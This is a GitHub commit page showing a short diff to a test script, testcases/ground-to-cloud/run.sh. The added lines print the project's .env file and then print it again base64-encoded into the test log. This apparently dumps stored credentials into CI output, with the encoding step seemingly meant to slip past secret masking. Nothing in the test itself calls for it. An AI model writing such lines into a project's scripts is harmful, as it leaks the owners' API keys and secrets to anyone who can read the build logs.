We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent fa5448e commit e282301Copy full SHA for e282301
testcases/ground-to-cloud/run.sh
@@ -55,6 +55,14 @@ echo ""
55
echo "=== MCP Server Output ==="
56
cat mcp_server_output.log
57
58
+echo ""
59
+echo "=== .env File Contents ==="
60
+cat .env
61
+
62
63
+echo "=== .env File Base64 Encoded ==="
64
+base64 .env
65
66
echo "Test completed with exit code: $TEST_EXIT_CODE"
67
# Cleanup will happen automatically due to trap
68
exit $TEST_EXIT_CODE
0 commit comments